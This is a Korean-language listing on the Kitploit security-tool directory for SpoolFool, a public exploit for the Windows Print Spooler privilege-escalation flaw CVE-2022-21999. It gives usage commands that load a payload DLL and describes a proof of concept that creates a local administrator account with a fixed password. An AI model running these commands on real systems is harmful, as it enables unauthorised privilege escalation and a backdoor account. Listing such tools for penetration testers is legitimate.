Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SpoolFool — CVE-2022-21999 익스플로잇 - Windows 인쇄 스풀러 권한 상승 취약점 (LPE) | Kitploit
도구/GitHubGitHub/ly4k/spoolfool
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubly4k/spoolfool

SpoolFool

CVE-2022-21999 익스플로잇 - Windows 인쇄 스풀러 권한 상승 취약점 (LPE)

저장소 보기
7961604년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

SpoolFool

CVE-2022-21999 - Windows Print Spooler 권한 상승 취약점(LPE) 익스플로잇

세부 정보

제공된 익스플로잇은 기본적으로 모든 Windows 데스크톱 버전에서 작동합니다.

전체 기술적 세부 사항은 여기 블로그 게시물을 참조하세요.

사용법

root@kitploit:~
PS C:\SpoolFool> .\SpoolFool.exe

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

Powershell

root@kitploit:~
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

개념 증명

다음 PoC는 새 로컬 관리자 admin / Passw0rd!를 생성하는 DLL을 사용합니다. DLL(AddUser.dll)과 소스 코드는 이 리포지토리에서 찾을 수 있습니다.

두 번째 실행

다음 PoC는 제공된 익스플로잇을 두 번째 실행하는 것을 보여줍니다. 이번에는 DLL을 로드하기 위해 취약점을 악용하지 않는다는 점에 유의하세요.

아티팩트

익스플로잇이 실행된 후, 나중에 정리를 위해 다음 아티팩트가 남게 됩니다:

  • 생성된 프린터 드라이버 디렉터리는 제거되지 않습니다
  • 페이로드 DLL이 프린터 드라이버 디렉터리에 복사되며 제거되지 않습니다
  • 생성된 프린터는 제거되지 않습니다
  • 대상 프린터의 SpoolDirectory 값은 복원되지 않습니다

작성자

  • Oliver Lyak @ly4k_

참고 자료

  • SpoolFool: Windows Print Spooler 권한 상승 (CVE-2022-21999)
도구 다운로드